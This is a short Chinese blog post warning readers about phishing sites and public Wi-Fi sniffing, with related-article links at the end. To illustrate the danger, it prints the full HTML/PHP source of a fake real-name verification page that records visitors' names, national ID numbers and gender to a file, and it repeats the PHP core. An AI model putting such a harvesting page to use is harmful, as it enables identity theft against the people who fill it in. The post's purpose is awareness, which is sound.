网络有多“安全”?
2020-04-06 07:15
881 查看
很多人都听说过什么“打击网络犯罪”,“小心上钩”之类的。但是大家有没有想过,在喊这些口号的同时,你已经“上钩了”。
第一个就是你可能经常会下载一下XX东西,这时,网站说要登录账户什么的,你发现你又没有账号。网站突然有跳出来了一个可以使用第三方登录的界面。假如是QQ,你不小心输了真实的号码和密码,这时,别人就会记录你输的内容,进行盗号。特别是实名认证网站要是作假,那你就完了。这里我就拿PHP写一个网站私自记录信息的脚本。
<!DOCTYPE html> <html> <title>钓鱼网页实例</title> <body> <h1>--------------实名认证系统-------------- <h1> <h5> <h5> <form name="a" method="post"> <table width="200" border="1"> <tr> <th scope="row">真实姓名</th> <td><input type="text" name="a"/></td> <td> </td> </tr> <tr> <th scope="row">身份证号码</th> <td><input type="text" name="b"/></td> <td> </td> </tr> <tr> <th scope="row">性别</th> <td>男<input type="radio" name="c" value="男" />女<input type="radio" name="c" value="女" /></td> <td><input type="submit" name="submit" value="提交"</td> </tr> </table> </form> <?php $name=$_POST['a']; $u=$_POST['b']; $x=$_POST['c']; $b="姓名:$name 身份证号码: $u 性别: $x \r\n"; file_put_contents ( 'name.txt', " $b " , FILE_APPEND ); ?></body> </html>
通过这段代码,记录者就可以把你的性别,名字,身份证号记录的name.txt里。真要的话,还会加上CSS,JavaScript和图片。如果不看网页源代码的话,谁也不知道那是真的还是假的。这个脚本里实际起作用的只有7行代码,就是
<?php $name=$_POST['a']; $u=$_POST['b']; $x=$_POST['c']; $b="姓名:$name 身份证号码: $u 性别: $x \r\n"; file_put_contents ( 'name.txt', " $b " , FILE_APPEND ); ?>
第二个就是公共场合宁肯浪费流量也不要连WIFI。因为公共场合了公共WIFI风险非常大。拿一个抓包软件,就可以轻轻松松抓到你的账号密码之类的。甚至有时可以拿软件进行改包,连安全的也变成危险的了。
本期就到这里了。下期会不定时发表。
- 点赞
- 收藏
- 分享
- 文章举报
相关文章推荐
- 利用IPsec实现网络安全之五(Kerveros实现身份验证)
- PKI网络安全系统的脆弱性大总结
- 网络安全入门术语必知
- 洞察安全市场:2013年度网络安全调研报告集
- 安全专家:真实的网络攻击取证纪实
- 网络安全成为今年的重要目标
- 保护系统安全 防范网络炸弹四招
- 网络安全:gh0st源码免杀手记
- 网络信息安全学习平台---解密关第9题
- 从会计的角度看网络安全审计
- Shadow Hook实现网络安全打印监控
- 网络安全工具开发函数库介绍
- 堆栈***——OSI网络安全防御
- 金融领域UNIX网络系统的安全管理策略
- 为什么民用的网络应用越来越多又越来越不安全?
- 黑客技术与网络安全(图)
- 超级网管员——网络安全